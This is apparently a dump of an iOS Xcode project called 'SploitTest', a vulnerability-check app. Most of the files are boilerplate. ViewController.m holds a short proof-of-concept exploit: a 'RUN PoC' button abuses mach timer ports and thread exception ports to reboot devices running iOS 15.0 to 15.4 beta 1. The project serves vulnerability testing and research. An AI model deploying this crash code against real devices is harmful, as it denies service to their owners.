--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8" standalone="no"?>
 2 | <document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="13122.16" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" launchScreen="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES" initialViewController="01J-lp-oVM">
 3 |     <dependencies>
 4 |         <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="13104.12"/>
 5 |         <capability name="Safe area layout guides" minToolsVersion="9.0"/>
 6 |         <capability name="documents saved in the Xcode 8 format" minToolsVersion="8.0"/>
 7 |     </dependencies>
 8 |     <scenes>
 9 |         <!--View Controller-->
10 |         <scene sceneID="EHf-IW-A2E">
11 |             <objects>
12 |                 <viewController id="01J-lp-oVM" sceneMemberID="viewController">
13 |                     <view key="view" contentMode="scaleToFill" id="Ze5-6b-2t3">
14 |                         <rect key="frame" x="0.0" y="0.0" width="375" height="667"/>
15 |                         <autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
16 |                         <color key="backgroundColor" xcode11CocoaTouchSystemColor="systemBackgroundColor" cocoaTouchSystemColor="whiteColor"/>
17 |                         <viewLayoutGuide key="safeArea" id="6Tk-OE-BBY"/>
18 |                     </view>
19 |                 </viewController>
20 |                 <placeholder placeholderIdentifier="IBFirstResponder" id="iYj-Kq-Ea1" userLabel="First Responder" sceneMemberID="firstResponder"/>
21 |             </objects>
22 |             <point key="canvasLocation" x="53" y="375"/>
23 |         </scene>
24 |     </scenes>
25 | </document>
26 | 


--------------------------------------------------------------------------------
/SploitTest/Base.lproj/Main.storyboard:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="19529" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES" initialViewController="BYZ-38-t0r">
 3 |     <device id="retina6_7" orientation="portrait" appearance="light"/>
 4 |     <dependencies>
 5 |         <deployment identifier="iOS"/>
 6 |         <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="19519"/>
 7 |         <capability name="Safe area layout guides" minToolsVersion="9.0"/>
 8 |         <capability name="System colors in document resources" minToolsVersion="11.0"/>
 9 |         <capability name="documents saved in the Xcode 8 format" minToolsVersion="8.0"/>
10 |     </dependencies>
11 |     <scenes>
12 |         <!--View Controller-->
13 |         <scene sceneID="tne-QT-ifu">
14 |             <objects>
15 |                 <viewController id="BYZ-38-t0r" customClass="ViewController" sceneMemberID="viewController">
16 |                     <view key="view" contentMode="scaleToFill" id="8bC-Xf-vdC">
17 |                         <rect key="frame" x="0.0" y="0.0" width="428" height="926"/>
18 |                         <autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
19 |                         <subviews>
20 |                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="iDevice Central" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="Mda-ok-4OH">
21 |                                 <rect key="frame" x="156" y="861" width="116" height="21"/>
22 |                                 <fontDescription key="fontDescription" type="system" pointSize="17"/>
23 |                                 <nil key="textColor"/>
24 |                                 <nil key="highlightedColor"/>
25 |                             </label>
26 |                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="App by GeoSn0w (@FCE365)" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="F60-Vr-zkq">
27 |                                 <rect key="frame" x="101" y="832" width="226" height="21"/>
28 |                                 <fontDescription key="fontDescription" type="system" pointSize="17"/>
29 |                                 <nil key="textColor"/>
30 |                                 <nil key="highlightedColor"/>
31 |                             </label>
32 |                             <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="RBd-RW-sIe">
33 |                                 <rect key="frame" x="20" y="427.66666666666669" width="388" height="71"/>
34 |                                 <constraints>
35 |                                     <constraint firstAttribute="height" constant="71" id="uKd-MQ-0C7"/>
36 |                                 </constraints>
37 |                                 <color key="tintColor" red="0.84465640779999995" green="0.51457053419999998" blue="1" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
38 |                                 <state key="normal" title="Button"/>
39 |                                 <buttonConfiguration key="configuration" style="filled" title="RUN PoC">
40 |                                     <fontDescription key="titleFontDescription" type="system" weight="semibold" pointSize="18"/>
41 |                                 </buttonConfiguration>
42 |                                 <connections>
43 |                                     <action selector="runPoc:" destination="BYZ-38-t0r" eventType="touchUpInside" id="amc-vc-jnD"/>
44 |                                 </connections>
45 |                             </button>
46 |                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="SploitTest" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="vYm-Yb-AHz">
47 |                                 <rect key="frame" x="134.66666666666666" y="162" width="158.99999999999997" height="63"/>
48 |                                 <constraints>
49 |                                     <constraint firstAttribute="height" constant="63" id="YWl-yh-iQQ"/>
50 |                                 </constraints>
51 |                                 <fontDescription key="fontDescription" type="system" pointSize="38"/>
52 |                                 <nil key="textColor"/>
53 |                                 <nil key="highlightedColor"/>
54 |                             </label>
55 |                         </subviews>
56 |                         <viewLayoutGuide key="safeArea" id="6Tk-OE-BBY"/>
57 |                         <color key="backgroundColor" systemColor="systemBackgroundColor"/>
58 |                         <constraints>
59 |                             <constraint firstItem="Mda-ok-4OH" firstAttribute="top" secondItem="F60-Vr-zkq" secondAttribute="bottom" constant="8" id="5H8-9r-VSp"/>
60 |                             <constraint firstItem="6Tk-OE-BBY" firstAttribute="bottom" secondItem="Mda-ok-4OH" secondAttribute="bottom" constant="10" id="6vO-ze-XSv"/>
61 |                             <constraint firstItem="vYm-Yb-AHz" firstAttribute="centerX" secondItem="RBd-RW-sIe" secondAttribute="centerX" id="8CJ-bu-IoV"/>
62 |                             <constraint firstItem="vYm-Yb-AHz" firstAttribute="top" secondItem="6Tk-OE-BBY" secondAttribute="top" constant="118" id="Mxu-BC-uqK"/>
63 |                             <constraint firstItem="F60-Vr-zkq" firstAttribute="centerX" secondItem="Mda-ok-4OH" secondAttribute="centerX" id="cRv-AF-PBF"/>
64 |                             <constraint firstItem="RBd-RW-sIe" firstAttribute="trailing" secondItem="8bC-Xf-vdC" secondAttribute="trailingMargin" id="hwd-gc-kBt"/>
65 |                             <constraint firstItem="RBd-RW-sIe" firstAttribute="centerY" secondItem="8bC-Xf-vdC" secondAttribute="centerY" id="u6i-Ku-k5Q"/>
66 |                             <constraint firstItem="RBd-RW-sIe" firstAttribute="leading" secondItem="8bC-Xf-vdC" secondAttribute="leadingMargin" id="z0r-6F-zlc"/>
67 |                             <constraint firstItem="RBd-RW-sIe" firstAttribute="centerX" secondItem="F60-Vr-zkq" secondAttribute="centerX" id="zZv-YT-qTB"/>
68 |                         </constraints>
69 |                     </view>
70 |                 </viewController>
71 |                 <placeholder placeholderIdentifier="IBFirstResponder" id="dkx-z0-nzr" sceneMemberID="firstResponder"/>
72 |             </objects>
73 |             <point key="canvasLocation" x="128.98550724637681" y="96.195652173913047"/>
74 |         </scene>
75 |     </scenes>
76 |     <resources>
77 |         <systemColor name="systemBackgroundColor">
78 |             <color white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
79 |         </systemColor>
80 |     </resources>
81 | </document>
82 | 


--------------------------------------------------------------------------------
/SploitTest/Info.plist:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 3 | <plist version="1.0">
 4 | <dict>
 5 | 	<key>UIApplicationSceneManifest</key>
 6 | 	<dict>
 7 | 		<key>UIApplicationSupportsMultipleScenes</key>
 8 | 		<false/>
 9 | 		<key>UISceneConfigurations</key>
10 | 		<dict>
11 | 			<key>UIWindowSceneSessionRoleApplication</key>
12 | 			<array>
13 | 				<dict>
14 | 					<key>UISceneConfigurationName</key>
15 | 					<string>Default Configuration</string>
16 | 					<key>UISceneDelegateClassName</key>
17 | 					<string>SceneDelegate</string>
18 | 					<key>UISceneStoryboardFile</key>
19 | 					<string>Main</string>
20 | 				</dict>
21 | 			</array>
22 | 		</dict>
23 | 	</dict>
24 | </dict>
25 | </plist>
26 | 


--------------------------------------------------------------------------------
/SploitTest/SceneDelegate.h:
--------------------------------------------------------------------------------
 1 | //
 2 | //  SceneDelegate.h
 3 | //  SploitTest
 4 | //
 5 | //  Created by GeoSn0w on 3/18/22.
 6 | //
 7 | 
 8 | #import <UIKit/UIKit.h>
 9 | 
10 | @interface SceneDelegate : UIResponder <UIWindowSceneDelegate>
11 | 
12 | @property (strong, nonatomic) UIWindow * window;
13 | 
14 | @end
15 | 
16 | 


--------------------------------------------------------------------------------
/SploitTest/SceneDelegate.m:
--------------------------------------------------------------------------------
 1 | //
 2 | //  SceneDelegate.m
 3 | //  SploitTest
 4 | //
 5 | //  Created by GeoSn0w on 3/18/22.
 6 | //
 7 | 
 8 | #import "SceneDelegate.h"
 9 | 
10 | @interface SceneDelegate ()
11 | 
12 | @end
13 | 
14 | @implementation SceneDelegate
15 | 
16 | 
17 | - (void)scene:(UIScene *)scene willConnectToSession:(UISceneSession *)session options:(UISceneConnectionOptions *)connectionOptions {
18 |     // Use this method to optionally configure and attach the UIWindow `window` to the provided UIWindowScene `scene`.
19 |     // If using a storyboard, the `window` property will automatically be initialized and attached to the scene.
20 |     // This delegate does not imply the connecting scene or session are new (see `application:configurationForConnectingSceneSession` instead).
21 | }
22 | 
23 | 
24 | - (void)sceneDidDisconnect:(UIScene *)scene {
25 |     // Called as the scene is being released by the system.
26 |     // This occurs shortly after the scene enters the background, or when its session is discarded.
27 |     // Release any resources associated with this scene that can be re-created the next time the scene connects.
28 |     // The scene may re-connect later, as its session was not necessarily discarded (see `application:didDiscardSceneSessions` instead).
29 | }
30 | 
31 | 
32 | - (void)sceneDidBecomeActive:(UIScene *)scene {
33 |     // Called when the scene has moved from an inactive state to an active state.
34 |     // Use this method to restart any tasks that were paused (or not yet started) when the scene was inactive.
35 | }
36 | 
37 | 
38 | - (void)sceneWillResignActive:(UIScene *)scene {
39 |     // Called when the scene will move from an active state to an inactive state.
40 |     // This may occur due to temporary interruptions (ex. an incoming phone call).
41 | }
42 | 
43 | 
44 | - (void)sceneWillEnterForeground:(UIScene *)scene {
45 |     // Called as the scene transitions from the background to the foreground.
46 |     // Use this method to undo the changes made on entering the background.
47 | }
48 | 
49 | 
50 | - (void)sceneDidEnterBackground:(UIScene *)scene {
51 |     // Called as the scene transitions from the foreground to the background.
52 |     // Use this method to save data, release shared resources, and store enough scene-specific state information
53 |     // to restore the scene back to its current state.
54 | }
55 | 
56 | 
57 | @end
58 | 


--------------------------------------------------------------------------------
/SploitTest/ViewController.h:
--------------------------------------------------------------------------------
 1 | //
 2 | //  ViewController.h
 3 | //  SploitTest
 4 | //
 5 | //  Created by GeoSn0w on 3/18/22.
 6 | //
 7 | 
 8 | #import <UIKit/UIKit.h>
 9 | 
10 | @interface ViewController : UIViewController
11 | 
12 | 
13 | @end
14 | 
15 | 


--------------------------------------------------------------------------------
/SploitTest/ViewController.m:
--------------------------------------------------------------------------------
 1 | //
 2 | //  ViewController.m
 3 | //  SploitTest
 4 | //
 5 | //  Created by GeoSn0w on 3/18/22.
 6 | //
 7 | 
 8 | #import "ViewController.h"
 9 | #include <mach/mach.h>
10 | #include <pthread.h>
11 | #include <mach/mach_time.h>
12 | #include <unistd.h>
13 | 
14 | extern mach_port_name_t mk_timer_create(void);
15 | 
16 | @interface ViewController ()
17 | 
18 | @end
19 | 
20 | @implementation ViewController
21 | 
22 | - (void)viewDidLoad {
23 |     [super viewDidLoad];
24 | 
25 | }
26 | 
27 | - (void)viewDidAppear:(BOOL)animated {
28 |     UIAlertController * alertvc = [UIAlertController alertControllerWithTitle: @ "Welcome!"
29 |                                      message: @"Tap the Run PoC button. If the device vulnerable, it will reboot itself. If nothing happens, the device is likely not vulnerable. This vulnerability should work on iOS 15.0 to 15.4 Beta 1, but won't work on 15.4 release or newer betas." preferredStyle: UIAlertControllerStyleAlert
30 |                                     ];
31 |       UIAlertAction * action = [UIAlertAction actionWithTitle: @ "Dismiss"
32 |                                 style: UIAlertActionStyleDefault handler: ^ (UIAlertAction * _Nonnull action) {
33 |                                   
34 |                                 }
35 |                                ];
36 |       [alertvc addAction: action];
37 |       [self presentViewController: alertvc animated: true completion: nil];
38 | }
39 | 
40 | - (IBAction)runPoc:(id)sender {
41 |     int p = mk_timer_create();
42 |     mach_port_insert_right(mach_task_self(),p,p,20); pthread_t t;
43 |     pthread_create(&t,0,C,&p);
44 |     for(;;);
45 | }
46 | void *C (void* a){
47 |     thread_set_exception_ports(mach_thread_self(), EXC_MASK_ALL,*(int *)a,2,6);
48 |     __builtin_trap();
49 |     return a;
50 | }
51 | 
52 | @end
53 | 


--------------------------------------------------------------------------------
/SploitTest/main.m:
--------------------------------------------------------------------------------
 1 | //
 2 | //  main.m
 3 | //  SploitTest
 4 | //
 5 | //  Created by GeoSn0w on 3/18/22.
 6 | //
 7 | 
 8 | #import <UIKit/UIKit.h>
 9 | #import "AppDelegate.h"
10 | 
11 | int main(int argc, char * argv[]) {
12 |     NSString * appDelegateClassName;
13 |     @autoreleasepool {
14 |         // Setup code that might create autoreleased objects goes here.
15 |         appDelegateClassName = NSStringFromClass([AppDelegate class]);
16 |     }
17 |     return UIApplicationMain(argc, argv, nil, appDelegateClassName);
18 | }
19 | 


--------------------------------------------------------------------------------